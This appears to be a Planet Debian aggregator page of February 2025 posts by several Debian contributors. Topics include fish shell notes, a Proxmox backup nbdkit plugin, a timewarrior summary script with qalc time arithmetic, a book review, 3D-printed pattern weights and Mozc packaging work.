 dov4l                       | 0.9+repack-1            | 2013-09-22 19:33:25+00
 textdraw                    | 0.2+ds-0+nmu1           | 2013-10-07 21:25:03+00
 gzrt                        | 0.8-1                   | 2013-10-08 06:33:13+00
 away                        | 0.9.5+ds-0+nmu2         | 2013-10-25 01:18:18+00
 jshon                       | 20131010-1              | 2013-11-30 00:00:11+00
 libstar-parser-perl         | 0.59-4                  | 2013-12-23 21:50:43+00
 gcal                        | 3.6.3-3                 | 2013-12-29 18:33:29+00
 fonts-larabie               | 1:20011216-5            | 2014-01-02 21:20:49+00
 ccd2iso                     | 0.3-4                   | 2014-01-28 06:33:35+00
 kerneltop                   | 0.91-1                  | 2014-02-04 12:03:30+00
 vera++                      | 1.2.1-2                 | 2014-02-04 21:21:37+00
(50 rows)

So there are 8 packages last uploaded to unstable in 2011, 12 packages in 2012 and 26 packages in 2013. I suspect their maintainers need help, and we should all offer our assistance. I already contacted two of them and hope the rest of the Debian community will chip in to help too. We should ensure any Debian-specific patches are passed upstream if they still exist, that the packages are brought up to speed with the latest Debian policy, and that the sources can be built with the current compiler set in Debian.

As usual, if you use Bitcoin and want to show your support of my activities, please send Bitcoin donations to my address 15oWEoG9dUPovwmUL9KWAnYRtNJEkP1u1b.

28 February, 2025 03:45PM

Jonathan Dowland

printables.com feed

I wanted to follow new content posted to Printables.com with a feed reader, but Printables.com doesn't provide one. Neither do the other obvious 3d model catalogues. So, I started building one.

I have something that spits out an Atom feed and a couple of beta testers gave me some valuable feedback. I had planned to make it public, with the ultimate goal being to convince Printables.com to implement feeds themselves.

Meanwhile, I stumbled across someone else who has done basically the same thing. Here are 3rd party feeds for

The format of their feeds is JSON Feed, which is new to me. FreshRSS and NetNewsWire seem happy with it. (I went with Atom.) I may still release my take, if I find time to make one improvement that my beta-testers suggested.
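
For the curious, a JSON Feed is pleasantly small. A minimal feed (all URLs hypothetical) looks roughly like this:

{
  "version": "https://jsonfeed.org/version/1.1",
  "title": "New models on Printables.com",
  "home_page_url": "https://www.printables.com/",
  "items": [
    {
      "id": "https://example.com/model/12345",
      "url": "https://example.com/model/12345",
      "title": "A new 3D model",
      "date_published": "2025-02-28T12:00:00Z"
    }
  ]
}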

28 February, 2025 12:26PM

Joey Hess

WASM Wayland Web (WWW)

So there are only 2 web browser engines, and it seems likely there will soon only be 1, and making a whole new web browser from the ground up is effectively impossible because the browser vendors have weaponized web standards complexity against any newcomers. Maybe eventually someone will succeed and there will be 2 again. Best case. What a situation.

So throw out all the web standards. Make a browser that just runs WASM blobs, and gives them a surface to use, sorta like Wayland does. It has tabs, and a throbber, and urls, but no HTML, no javascript, no CSS. Just HTTP of WASM blobs.

This is where the web browser is going eventually anyway, except in the current line of evolution it will be WASM with all the web standards complexity baked in and reinforcing the current situation.

Would this be a mass of proprietary software? Have you looked at any corporate website's "source" lately? But what's important is that this would make it easy enough to build new browsers that they would stop being a point of control.

Want a browser that natively supports RSS? Poll the feeds, make a UI, download the WASM enclosures to view the posts. Want a browser that supports IPFS or gopher? Fork any browser and add it, the maintenance load will be minimal. Want to provide access to GPIO pins or something? Add an extension that can be accessed via the WASI component model. This would allow for so many things like that which won't and can't happen with the current market duopoly browser situation.

And as for your WASM web pages, well you can still use HTML if you like. Use the WASI component model to pull in a HTML engine. It doesn't need to support everything, just the parts of web standards that you want to use. Or you can do something entirely different in your WASM that is not HTML based at all but a better paradigm (oh hi Spritely or display postscript or gemini capsules or whatever).

Dual innovation sources or duopoly? I know which I'd prefer. This is not my project to build though.

28 February, 2025 06:37AM

Antoine Beaupré

testing the fish shell

I have been testing fish for a couple months now (this file started on 2025-01-03T23:52:15-0500 according to stat(1)), and those are my notes. I suspect people will have Opinions about my comments here. Do not comment unless you have some Constructive feedback to provide: I don't want to know if you think I am holding it Wrong. Consider that I might have used UNIX shells for longer than you have lived.

I'm not sure I'll keep using fish, but so far it's the first shell that survived heavy use outside of zsh(1) (unless you count tcsh(1), but that was in another millennium).

My normal shell is bash(1), and it's still the shell I use everywhere other than my laptop, as I haven't switched on all the servers I manage, although it has been available on torproject.org servers since August 2022. I first got interested in fish because they ported it to Rust, making it one of the rare shells out there written in a "safe" and modern programming language, released after an impressive ~2 years of work with Fish 4.0.

Cool things

Current directory gets shortened, ~/wikis/anarc.at/software/desktop/wayland shows up as ~/w/a/s/d/wayland

Autocompletion rocks.

Default prompt rocks. Doesn't seem vulnerable to command injection assaults, at least it doesn't trip on the git-landmine.

It even includes pipe status output, which was a huge pain to implement in bash. Made me realize that if the last command succeeds, we don't see other failures, which is the case of my current prompt anyways! Signal reporting is better than my bash implementation too.

So far the only modification I have made to the prompt is to add a printf '\a' to output a bell.

By default, fish keeps a directory history (but separate from the pushd stack), that can be navigated with cdh, prevd, and nextd, dirh shows the history.
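
A quick illustration of those commands (prompt shortened here):

~> cd /tmp
/tmp> cd /var/log
/var/log> prevd    # jump back to /tmp
/tmp> nextd        # and forward again to /var/log
/var/log> dirh     # print the directory history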

Less cool

I feel there's visible latency in the prompt creation.

POSIX-style functions (foo() { true }) are unsupported. Instead, fish uses whitespace-sensitive definitions like this:

function foo
    true
end

This means my (modest) collection of POSIX functions needs to be ported to fish. Workaround: simple functions can be turned into aliases, which fish supports (but implements using functions).
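
For instance (a minimal sketch; the alias name is made up):

# define an alias; fish actually generates a function called gs
alias gs 'git status'

# inspect the generated function definition
functions gs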

EOF heredocs are considered to be "minor syntactic sugar". I find them frigging useful.

Command substitution is split on newlines, not whitespace; you need to pipe through string split -n " " to get the equivalent.
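
A small sketch of the difference, using the count builtin to show the number of elements:

# one element: the substitution only splits on newlines
count (echo "a b")

# two elements after an explicit split on spaces
count (echo "a b" | string split -n " ")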

<(cmd) doesn't exist: they claim you can use cmd | foo - as a replacement, but that's not correct: I used <(cmd) mostly where foo does not support - as a magic character to say 'read from stdin'.

Documentation is... limited. It seems mostly geared towards the web docs, which are... okay (but I couldn't find out about ~/.config/fish/conf.d there!), but this is really inconvenient when you're trying to browse the manual pages. For example, fish thinks there's a fish_prompt manual page, according to its own completion mechanism, but man(1) cannot find that manual page. I can't find the manual for the time command (which is actually a keyword!)

Fish renders multi-line commands with newlines. So if your terminal looks like this, say:

anarcat@angela:~> sq keyring merge torproject-keyring/lavamind-
95F341D746CF1FC8B05A0ED5D3F900749268E55E.gpg torproject-keyrin
g/weasel-E3ED482E44A53F5BBE585032D50F9EBC09E69937.gpg | wl-copy

... but it's actually one line. When you copy-paste the above in foot(1), it will show up exactly like this, newlines and all:

sq keyring merge torproject-keyring/lavamind-
95F341D746CF1FC8B05A0ED5D3F900749268E55E.gpg torproject-keyrin
g/weasel-E3ED482E44A53F5BBE585032D50F9EBC09E69937.gpg | wl-copy

Whereas it should show up like this:

sq keyring merge torproject-keyring/lavamind-95F341D746CF1FC8B05A0ED5D3F900749268E55E.gpg torproject-keyring/weasel-E3ED482E44A53F5BBE585032D50F9EBC09E69937.gpg | wl-copy

Note that this is an issue specific to foot(1); alacritty(1) and gnome-terminal(1) don't suffer from it.

Blockers

() is like $(): it's command substitution, and not a subshell. This is really impractical: I use ( cd foo ; do_something) all the time to avoid losing the current directory... I guess I'm supposed to use pushd for this, but ouch. This wouldn't be so bad if it was just for cd though. Clean constructs like this:

( git grep -l '^#!/.*bin/python' ; fdfind .py ) | sort -u

Turn into what i find rather horrible:

begin; git grep -l '^#!/.*bin/python' ; fdfind .py ; end | sort -u

It... works, but it goes back to "oh dear, now there's a new language again". I only found out about this construct while trying:

{ git grep -l '^#!/.*bin/python' ; fdfind .py } | sort -u 

... which fails and suggests using begin/end, at which point: why not just support the curly braces?

FOO=bar is not allowed. It's actually recognized syntax, but it creates a warning. We're supposed to use set foo bar instead. This really feels like a needless divergence from the standard.

Aliases are... peculiar. Typical constructs like alias mv="\mv -i" don't work because fish treats aliases as a function definition, and \ is not magical there. This can be worked around by specifying the full path to the command, with e.g. alias mv="/bin/mv -i". Another problem is trying to override a built-in, which seems completely impossible. In my case, I like the time(1) command the way it is, thank you very much, and fish provides no way to bypass that builtin. It is possible to call time(1) with command time, but it's not possible to replace the command keyword so that means a lot of typing.

Again: you can't use \ to bypass aliases. This is a huge annoyance for me. I would need to learn to type command in long form, and I use that stuff pretty regularly. I guess I could alias command to c or something, but this is one of those huge muscle memory challenges.

Alt-. doesn't always work the way I expect.

28 February, 2025 05:31AM

Michael Ablassmeier

proxmox backup nbdkit plugin round 2

I re-implemented the proxmox backup nbdkit plugin in C.

It seems golang shared libraries don’t play well with programs that fork().

As a result, the plugin was only usable if nbdkit was run in foreground mode (-f), making it impossible to use nbdkit's captive modes, which are quite useful. Lessons learned.
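
Captive mode, for context, starts a client under nbdkit and tears the server down once the client exits. A quick sketch using the bundled memory plugin and nbdinfo from libnbd:

# serve a 1G RAM disk on a private unix socket, run the client, then exit
nbdkit -U - memory 1G --run 'nbdinfo "$uri"'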

Here is the C version

28 February, 2025 12:00AM

February 25, 2025

Divine Attah-Ohiemi

Re-styling Debian's Download Page

main points from this blog post:

I am tasked with contributing to the debianhugo project, whose aim is to redesign the old Debian pages and make the content more accessible. We've since reached a significant milestone and migrated multiple pages, including the start, intro, news and now the download page.

creating "simple" and "advanced" download pages

At first we made the "simple" download page:

  • target audience: less experienced users
  • only the more common download architectures/options, i.e. amd64 (64-bit PC) and arm64
  • descriptive content for an easy user experience: listing positives and negatives of each option, adding download sizes
  • interactive download cards with ISO, torrent and debian-cd mirror selections.

"advanced" download page:

  • more download architectures and options, including testing release streams
  • straight-to-the-point content

challenges/issues while developing

The mirror selection option, while it might help with faster downloads depending on the region, is still a somewhat manual process on the user's end and can come with various complications, like the chosen debian-cd mirror not having the latest version of Debian.

We're looking into whether delivery of the images/ISOs can also be done through the Fastly CDN, which would save us from offering manual mirror selection.

25 February, 2025 09:54PM by Divine Attah-Ohiemi

Michael Ablassmeier

proxmox backup nbdkit plugin

nbdkit is a really powerful NBD toolkit.

Lately, I wanted to access VM backups from a Proxmox Backup Server via the network (not by using the proxmox-backup-client map function).

For example, to test-boot a virtual machine snapshot directly from a backup. NBD suits that use case quite well, so I quickly put an nbdkit plugin together that can be used for this.

The available golang bindings for the Proxmox Backup client API made that quite easy.

As nbdkit already comes with a neat COW filter, it's only been a few lines of Go code, resulting in: pbsnbd
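
Usage could then look roughly like the sketch below; the plugin parameters are placeholders, so check the pbsnbd README for the real ones:

# expose a PBS snapshot over NBD, with copy-on-write on top so the
# backup itself stays untouched, and test-boot it with qemu
nbdkit --filter=cow ./pbsnbd.so repository=... snapshot=... \
    --run 'qemu-system-x86_64 -m 2G -drive file="$uri",format=raw'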

25 February, 2025 12:00AM

February 24, 2025

Russ Allbery

Review: A Little Vice

Review: A Little Vice, by Erin E. Elkin

Publisher: Erin Elkin
Copyright: June 2024
ASIN: B0CTHRK61X
Format: Kindle
Pages: 398

A Little Vice is a stand-alone self-published magical girl novel. It is the author's first novel.

C is a high school student and frequent near-victim of monster attacks. Due to the nefarious work of Avaritia Wolf and her allies, his high school is constantly attacked by Beasts, who are magical corruptions of some internal desire taken to absurd extremes. Standing in their way are the Angelic Saints: magical girls who transform into Saint Castitas, Saint Diligentia, and Saint Temperantia and fight the monsters. The monsters for some reason seem disposed to pick C as their victim for hostage-taking, mind control, use as a human shield, and other rather traumatic activities. He's always rescued by the Saints before any great harm is done, but in some ways this makes the situation worse.

It is obvious to C that the Saints are his three friends Inessa, Ida, and Temperance, even though no one else seems able to figure this out despite the blatant clues. Inessa has been his best friend since childhood when she was awkward and needed his support. Now, she and his other friends have become literal heroes, beautiful and powerful and capable, constantly protecting the school and innocent people, and C is little more than a helpless burden to be rescued. More than anything else, he wishes he could be an Angelic Saint like them, but of course the whole idea is impossible. Boys don't get to be magical girls.

(I'm using he/him pronouns for C in this review because C uses them for himself for most of the book.)

This is a difficult book to review because it is deeply focused on portraying a specific internal emotional battle in all of its sometimes-ugly complexity, and to some extent it prioritizes that portrayal over conventional story-telling. You have probably already guessed that this is a transgender coming-out story — Elkin's choice of the magical girl genre was done with deep understanding of its role in transgender narratives — but more than that, it is a transgender coming-out story of a very specific and closely-observed type. C knows who he wishes he was, but he is certain that this transformation is absolutely impossible. He is very deep in a cycle of self-loathing for wanting something so manifestly absurd and insulting to people who have the virtues that C does not.

A Little Vice is told in the first person from C's perspective, and most of this book is a relentless observation of C's anxiety and shame spiral and reflexive deflection of any possibility of a way out. This is very well-written: Elkin knows the reader is going to disagree with C's internalized disgust and hopelessness, knows the reader desperately wants C to break out of that mindset, and clearly signals in a myriad of adroit ways that Elkin is on the reader's side and does not agree with C's analysis. C's friends are sympathetic, good-hearted people, and while sometimes oblivious, it is obvious to the reader that they're also on the reader's side and would help C in a heartbeat if they saw an opening. But much of the point of the book is that it's not that easy, that breaking out of the internal anxiety spiral is nearly impossible, and that C is very good at rejecting help, both because he cannot imagine what form it could take but also because he is certain that he does not deserve it.

In other words, much of the reading experience of this book involves watching C torture and insult himself. It's all the more effective because it isn't gratuitous. C's internal monologue sounds exactly like how an anxiety spiral feels, complete with the sort of half-effective coping mechanisms, deflections, and emotional suppression one develops to blunt that type of emotional turmoil.

I normally hate this kind of book. I am a happy ending and competence porn reader by default. The world is full of enough pain that I don't turn to fiction to read about more pain. It says a lot about how well-constructed this book is that I stuck with it. Elkin is going somewhere with the story, C gets moments of joy and delight along the way to keep the reader from bogging down completely, and the best parts of the book feel like a prolonged musical crescendo with suspended chords. There is a climax coming, but Elkin is going to make you wait for it for far longer than you want to.

The main element that protects A Little Vice from being too grim is that it is a genre novel that is very playful about both magical girls and superhero tropes in general. I've already alluded to one of those elements: Elkin plays with the Mask Principle (the inability of people to see through entirely obvious secret identities) in knowing and entertaining ways. But there are also villains, and that leads me to the absolutely delightful Avaritia Wolf, who for me was the best character in this book.

The Angelic Saints are not the only possible approach to magical girl powers in this universe. There are villains who can perform a similar transformation, except they embrace a vice rather than a virtue. Avaritia Wolf embraces the vice of greed. They (Avaritia's pronouns change over the course of the book) also have a secret identity, which I suspect will be blindingly obvious to most readers but which I'll avoid mentioning since it's still arguably a spoiler.

The primary plot arc of this book is an attempt to recruit C to the side of the villains. The Beasts are drawn to him because he has magical potential, and the villains are less picky about gender. This initially involves some creepy and disturbing mind control, but it also brings C into contact with Avaritia and Avaritia's very specific understanding of greed. As far as Avaritia is concerned, greed means wanting whatever they want, for whatever reason they feel like wanting it, and there is absolutely no reason why that shouldn't include being greedy for their friends to be happy. Or doing whatever they can to make their friends happy, whether or not that looks like villainy.

Elkin does two things with this plot that I thought were remarkably skillful. The first is that she directly examines and then undermines the "easy" transgender magical girl ending. In a world of transformation magic, someone who wants to be a girl could simply turn into a girl and thus apparently resolve the conflict in a way that makes everyone happy. I think there is an important place for that story (I am a vigorous defender of escapist fantasy and happy endings), but that is not the story that Elkin is telling. I won't go into the details of why and how the story complicates and undermines this easy ending, but it's a lot of why this book feels both painful and honest to a specific, and very not easy, transgender experience, even though it takes place in an utterly unrealistic world.

But the second, which is more happy and joyful, is that Avaritia gleefully uses a wholehearted embrace of every implication of the vice of greed to bulldoze the binary morality of the story and question the classification of human emotions into virtues and vices. They are not a hero, or even all that good; they have some serious flaws and a very anarchic attitude towards society. But Avaritia provides the compelling, infectious thrill of the character who looks at the social construction of morality that is constraining the story and decides that it's all bullshit and refuses to comply. This is almost the exact opposite of C's default emotional position at the start of the book, and watching the two characters play off of each other in a complex friendship is an absolute delight.

The ending of this book is complicated, messy, and incomplete. It is the sort of ending that I think could be incredibly powerful if it hits precisely the right chords with the reader, but if you're not that reader, it can also be a little heartbreaking because Elkin refuses to provide an easy resolution. The ending also drops some threads that I wish Elkin hadn't dropped; there are some characters who I thought deserved a resolution that they don't get. But this is one of those books where the author knows exactly what story they're trying to tell and tells it whether or not that fits what the reader wants. Those books are often not easy reading, but I think there's something special about them.

This is not the novel for people who want detailed world-building that puts a solid explanation under events. I thought Elkin did a great job playing with the conventions of an episodic anime, including starting the book on Episode 12 to imply C's backstory with monster attacks and hinting at a parallel light anime story by providing TV-trailer-style plot summaries and teasers at the start and end of each chapter. There is a fascinating interplay between the story in which the Angelic Saints are the protagonists, which the reader can partly extrapolate, and the novel about C that one is actually reading. But the details of the world-building are kept at the anime plot level: There's an arch-villain, a World Tree, and a bit of backstory, but none of it makes that much sense or turns into a coherent set of rules. This is a psychological novel; the background and rules exist to support C's story.

If you do want that psychological novel... well, I'm not sure whether to recommend this book or not. I admire the construction of this book a great deal, but I don't think appealing to the broadest possible audience was the goal. C's anxiety spiral is very repetitive, because anxiety spirals are very repetitive, and you have to be willing to read for the grace notes on the doom loop if you're going to enjoy this book. The sentence-by-sentence writing quality is fine but nothing remarkable, and is a bit shy of the average traditionally-published novel. The main appeal of A Little Vice is in the deep and unflinching portrayal of a specific emotional journey. I think this book is going to work if you're sufficiently invested in that journey that you are willing to read the brutal and repetitive parts. If you're not, there's a chance you will bounce off this hard.

I was invested, and I'm glad I read this, but caveat emptor. You may want to try a sample first.

One final note: If you're deep in the book world, you may wonder, like I did, if the title is a reference to Hanya Yanagihara's (in)famous A Little Life. I do not know for certain — I have not read that book because I am not interested in being emotionally brutalized — but if it is, I don't think there is much similarity. Both books are to some extent about four friends, but I couldn't find any other obvious connections from some Wikipedia reading, and A Little Vice, despite C's emotional turmoil, seems to be considerably more upbeat.

Content notes: Emotionally abusive parent, some thoughts of self-harm, mind control, body dysmorphia, and a lot (a lot) of shame and self-loathing.

Rating: 7 out of 10

24 February, 2025 05:04AM

Valhalla's Things

Hexagonal Pattern Weights

Posted on February 24, 2025
Tags: madeof:atoms, craft:3dprint, craft:sewing

Eight hexagonal pieces with free software / culture related graphics on top.

For quite a few years, I’ve been using pattern weights instead of pins when cutting fabric, starting with random objects and then mostly using some big washers from the local hardware store.

However, at about 22 g per washer, I needed quite a few of them, and dealing with them tended to get unwieldy; I don’t remember how it happened, but one day I decided to make myself some bigger weights with a few washers each.

I suspect I had seen somebody online with some nice hexagonal pattern weights, and hexagonal of course reminded me of the Stickers Standard, so I settled on a hexagon 5 cm tall and decided I could 3D-print it in a way that could be filled with washers for weight.

Rather than bothering with adding a lid (and fitting it), I decided to close the bottom by gluing a piece of felt, with the added advantage that it would protect whatever the weight was being used on. And of course the top could be decorated with a nerdish sticker, because, well, I am a nerd.

I made a few of these pattern weights, used them for a while, was happy with them, and then a few days ago I received some new hexagonal stickers I had had printed, and realized that while I had taken a picture with all of the steps in assembling them, I had never published any kind of instructions on how to make them — and I had not even pushed the source file on the craft tools git repository.

And yesterday I fixed that: the instructions are now on my craft pattern website, with generated STL files, the git repository has been updated with the current sources, and now I’ve even written this blog post :)

24 February, 2025 12:00AM

February 23, 2025

hackergotchi for Colin Watson

Colin Watson

Qalculate time hacks

Anarcat recently wrote about Qalculate, and I think I’m a convert, even though I’ve only barely scratched the surface.

The thing I almost immediately started using it for is time calculations. When I started tracking my time, I quickly found that Timewarrior was good at keeping all the data I needed, but I often found myself extracting bits of it and reprocessing it in variously clumsy ways. For example, I often don’t finish a task in one sitting; maybe I take breaks, or I switch back and forth between a couple of different tasks. The raw output of timew summary is a bit clumsy for this, as it shows each chunk of time spent as a separate row:

$ timew summary 2025-02-18 Debian

Wk Date       Day Tags                            Start      End    Time   Total
W8 2025-02-18 Tue CVE-2025-26465, Debian,       9:41:44 10:24:17 0:42:33
                  next, openssh
                  Debian, FTBFS with GCC-15,   10:24:17 10:27:12 0:02:55
                  icoutils
                  Debian, FTBFS with GCC-15,   11:50:05 11:57:25 0:07:20
                  kali
                  Debian, Upgrade to 0.67,     11:58:21 12:12:41 0:14:20
                  python_holidays
                  Debian, FTBFS with GCC-15,   12:14:15 12:33:19 0:19:04
                  vigor
                  Debian, FTBFS with GCC-15,   12:39:02 12:39:38 0:00:36
                  python_setproctitle
                  Debian, Upgrade to 1.3.4,    12:39:39 12:46:05 0:06:26
                  python_setproctitle
                  Debian, FTBFS with GCC-15,   12:48:28 12:49:42 0:01:14
                  python_setproctitle
                  Debian, Upgrade to 3.4.1,    12:52:07 13:02:27 0:10:20 1:44:48
                  python_charset_normalizer

                                                                         1:44:48

So I wrote this Python program to help me:

#! /usr/bin/python3

"""
Summarize timewarrior data, grouped and sorted by time spent.
"""

import json
import subprocess
from argparse import ArgumentParser, RawDescriptionHelpFormatter
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from operator import itemgetter

from rich import box, print
from rich.table import Table


parser = ArgumentParser(
    description=__doc__, formatter_class=RawDescriptionHelpFormatter
)
parser.add_argument("-t", "--only-total", default=False, action="store_true")
parser.add_argument(
    "range",
    nargs="?",
    default=":today",
    help="Time range (usually a hint, e.g. :lastweek)",
)
parser.add_argument("tag", nargs="*", help="Tags to filter by")
args = parser.parse_args()

entries: defaultdict[str, timedelta] = defaultdict(timedelta)
now = datetime.now(timezone.utc)
for entry in json.loads(
    subprocess.run(
        ["timew", "export", args.range, *args.tag],
        check=True,
        capture_output=True,
        text=True,
    ).stdout
):
    start = datetime.fromisoformat(entry["start"])
    if "end" in entry:
        end = datetime.fromisoformat(entry["end"])
    else:
        end = now
    entries[", ".join(entry["tags"])] += end - start

if not args.only_total:
    table = Table(box=box.SIMPLE, highlight=True)
    table.add_column("Tags")
    table.add_column("Time", justify="right")
    for tags, time in sorted(entries.items(), key=itemgetter(1), reverse=True):
        table.add_row(tags, str(time))
    print(table)

total = sum(entries.values(), start=timedelta())
hours, rest = divmod(total, timedelta(hours=1))
minutes, rest = divmod(rest, timedelta(minutes=1))
seconds = rest.seconds
print(f"Total time: {hours:02}:{minutes:02}:{seconds:02}")
$ summarize-time 2025-02-18 Debian

  Tags                                                     Time
 ───────────────────────────────────────────────────────────────
  CVE-2025-26465, Debian, next, openssh                 0:42:33
  Debian, FTBFS with GCC-15, vigor                      0:19:04
  Debian, Upgrade to 0.67, python_holidays              0:14:20
  Debian, Upgrade to 3.4.1, python_charset_normalizer   0:10:20
  Debian, FTBFS with GCC-15, kali                       0:07:20
  Debian, Upgrade to 1.3.4, python_setproctitle         0:06:26
  Debian, FTBFS with GCC-15, icoutils                   0:02:55
  Debian, FTBFS with GCC-15, python_setproctitle        0:01:50

Total time: 01:44:48

Much nicer. But that only helps with some of my reporting. At the end of a month, I have to work out how much time to bill Freexian for and fill out a timesheet, and for various reasons those queries don’t correspond to single timew tags: they sometimes correspond to the sum of all time spent on multiple tags, or to the time spent on one tag minus the time spent on another tag, or similar. As a result I quite often have to do basic arithmetic on time intervals; but that’s surprisingly annoying! I didn’t previously have good tools for that, and was reduced to doing things like str(timedelta(hours=..., minutes=..., seconds=...) + ...) in Python, which gets old fast.
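
Spelled out, that’s the kind of thing I mean (a minimal sketch, using the same durations as the qalc example below):

>>> from datetime import timedelta
>>> str(timedelta(hours=62, minutes=46, seconds=30) - timedelta(hours=51, minutes=2, seconds=42))
'11:43:48'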

Instead:

$ qalc '62:46:30 - 51:02:42 to time'
(225990 / 3600) − (183762 / 3600) = 11:43:48

I also often want to work out how much of my time I’ve spent on Debian work this month so far, since Freexian pays me for up to 20% of my work time on Debian; if I’m under that then I might want to prioritize more Debian projects, and if I’m over then I should be prioritizing more Freexian projects as otherwise I’m not going to get paid for that time.

$ summarize-time -t :month Freexian
Total time: 69:19:42
$ summarize-time -t :month Debian
Total time: 24:05:30
$ qalc '24:05:30 / (24:05:30 + 69:19:42) to %'
(86730 / 3600) / ((86730 / 3600) + (249582 / 3600)) ≈ 25.78855349%

I love it.

23 February, 2025 08:00PM by Colin Watson

Iustin Pop

Still alive, but this blog not really

Sigh, sometimes I really don’t understand time. And I don’t mean in the physics sense.

It’s just, the days have way fewer hours than 10 years ago, or there’s way more stuff to do. Probably the latter 😅

No time for real open-source work, but I managed to do some minor coding, released a couple of minor versions (as upstream), and packaged some refreshes in Debian. The latter only because I got involved, against better judgement, in some too heated discussions, but they ended well, somehow. The whole episode motivated me to actually do some work, even if minor, rather than just rant on mailing lists 🙊.

My sports life is still pretty erratic, but despite some repeated sickness (my fault, for not sleeping well enough) and tendon issues, there are months in which I can put down 100km. And the skiing season was really awesome.

So life goes on, but I definitely am not keeping up with entropy, even in simple things such as my inbox. One day I’ll write a real blog post, not just an update, but in the meantime, it is what it is.

And yes, running 10km while still sick just because you’re bored is not the best idea. According to a friend, of course, not to my Strava account.

23 February, 2025 03:20PM

hackergotchi for Kentaro Hayashi

Kentaro Hayashi

Short journey to Mozc 2.29.5160.102+dfsg-1

Introduction

This is just a note about how I upgraded the Mozc package last year to get it ready (with many restrictions) for the upcoming trixie release.

Maybe Mozc 2.29.5160.102+dfsg-1.3 will be shipped for Debian 13 (trixie).

FTBFS with Mozc 2.28.4715.102+dfsg-2.2

In May 2024, I found that Mozc had been removed from testing and was still failing to build from source (FTBFS).

#1068186 - mozc: FTBFS with abseil 20230802: ../../base/init_mozc.cc:90:29: error: ‘absl::debian5::flags_internal::ArgvListAction’ has not been declared - Debian Bug report logs

That FTBFS was fixed upstream, but the fix was not applied in Debian for a while. Fixing it required not only the upstream patch, but also an additional linkage patch.

Mozc is the de facto standard input method editor for Japanese. Most Japanese users use it by default on the Linux desktop.

(Even when the frontend input method framework differs, the backend engine is Mozc in most cases: uim-mozc for task-japanese-desktop, ibus-mozc for task-japanese-gnome-desktop in Debian.)

Some users rebuild Mozc locally with an integrated external dictionary to increase its vocabulary. An ongoing FTBFS blocks that use case, so I sent patches to fix it, and they were merged.

Motivation to update Mozc

While fixing #1068186, I also found that the Mozc version had not been synced with upstream for a long time.

At that time, Mozc in unstable was version 2.28.4715.102+dfsg, but upstream had already released 2.30.5544.102. It seemed that Mozc's maintainer was too busy to update it, so I tried to do it myself.

The blockers for updating Mozc

But it was not such an easy task: packaging the latest Mozc had many blockers.

  • Newer Mozc requires Bazel to build, but there is no suitable Bazel package (there is bazel-bootstrap 4.x, but it's old; v6.x or newer is required)
  • Newer abseil and protobuf were required
  • The renderer was changed to Qt; the GTK renderer was removed
  • Existing patchsets (e.g. for UIM, for Fcitx) had to be revised

And that was not all.

Road to latest Mozc

First, I knew about the debian-bazel effort, so I posted a question about the bazel packaging progress.

Any updates about bazel packaging effort?

Sadly, there was no response. Thus, adopting Bazel as the build toolchain was not realistic; in other words, we needed to keep the GYP patch and maintain it.

As another topic, upstream changed the renderer from GTK+ to Qt.

Here are the major topics about each release of Mozc.

  • 2.30.5544.102 Require abseil 20240116.1 or later
  • 2.29.5544.102 GYP was deprecated
  • 2.29.5374.102
  • 2.29.5268.102 No gtk renderer anymore, need Qt.
  • 2.29.5160.102
    • The last version in which the gtk renderer is available.
    • --use_gyp_for_ibus_build option was removed.
  • 2.28.5029.102
  • 2.28.4880.102
  • 2.28.4715.102+dfsg Debian sid

The internal renderer change was too big, and even before GYP's deprecation in 2.29.5544.102, GYP support had already been removed gradually.

As a result, targeting 2.29.5160.102 was the practical approach to move things forward.

Revisit existing patchsets for 2.28.4715.102+dfsg

Second, I needed to revisit the existing patchsets and triage them.

  • 0001-Update-uim-mozc-to-c979f127acaeb7b35d3344e8b1e40848e.patch
    • Required
  • 0002-Support-fcitx.patch
    • Required
  • 0003-Change-compiler-from-clang-to-gcc.patch
  • 0004-Add-usage_dict.txt.patch
    • Required. (maybe)
  • 0005-Enable-verbose-build.patch
    • Required.
  • 0006-Update-gyp-using-absl.patch
    • Required and need massive refactoring.
  • 0007-common.gypi-Use-command-v-instead-of-which.patch
    • (maybe) Not needed anymore
  • 0009-protobuf.gyp-Add-latomic-to-link_settings.patch
    • Required.
  • 0010-Fix-the-compile-error-of-ParseCommandLineFlags-with.patch
    • Required. Should be merged into 0006 patch.
  • 0011-Fix-missing-abseil-gyp-link-settings.patch
    • Required. Should be merged into 0006 patch.

The UIM patch was maintained in a third-party repository whose directory structure was quite different from Mozc's. Its maintenance activity seemed too low, so just picking changes from macuim was not enough; fixing the FTBFS required additional work.

The Fcitx patch was also maintained, in fcitx/mozc, but it tracks only the master branch, so it was hard to pick a patchset for a specific version of Mozc.

Finally, I managed to refresh the patchset for 2.29.5160.102.

  • support-uim.patch
  • support-fcitx.patch
  • change-compiler-from-clang-to-gcc.patch
  • add-japanese-usage-dictionary.patch
  • enable-verbose-build.patch
  • update-gyp-using-system-abseil.patch
  • gyp-using-command-instead-of-which.patch
  • gyp-protobuf-link-with-atomic.patch
  • enable-deprecated-gtk-renderer.patch
  • fix-compile-error-of-ParseCommandLineFlags.patch
  • enable-use_gyp_for_ibus_build-again.patch
  • ibus-drop-needless-client_mock.patch
  • protobuf-revert-internal-cleanup.patch
  • uim-mozc-fix-ftbfs.patch

Improve packaging task

Mozc needs to be repacked, but it didn't use Files-Excluded yet, so I introduced a d/watch file to repack the upstream source.

This makes the source package more reproducible.

OT: Hardware breakage

There was another blocker for this task: g++ randomly segfaulted while building Mozc. At first I wondered why it failed, but after digging further I found that a memory module was corrupted. Thus I lost 32GB of memory modules. :-<

Unexpected behaviour in uim-mozc

When I uploaded Mozc 2.29.5160.102+dfsg-1 to experimental, I found a case where uim-mozc behaves weirdly: the candidate words were shown with flickering.

But it was not a regression in this upload.

uim-mozc under Wayland causes that problem.

Thus GNOME and its derivatives might not be affected, because ibus-mozc is used there.

Mozc 2.29.5160.102+dfsg-1

Once the patchset had matured, I uploaded 2.29.5160.102+dfsg-1 with the --delayed 15 option.

$ dput --delayed 15 mozc_2.29.5160.102+dfsg-1_source.changes
Uploading mozc using ftp to ftp-master (host: ftp.upload.debian.org; directory: /pub/UploadQueue/DELAYED/15-day)
running allowed-distribution: check whether a local profile permits uploads to the target distribution
running protected-distribution: warn before uploading to distributions where a special policy applies
running checksum: verify checksums before uploading
running suite-mismatch: check the target distribution for common errors
running gpg: check GnuPG signatures before the upload
 signfile dsc mozc_2.29.5160.102+dfsg-1.dsc 719EB2D93DBE9C4D21FBA064F7FB75C566ED20E3

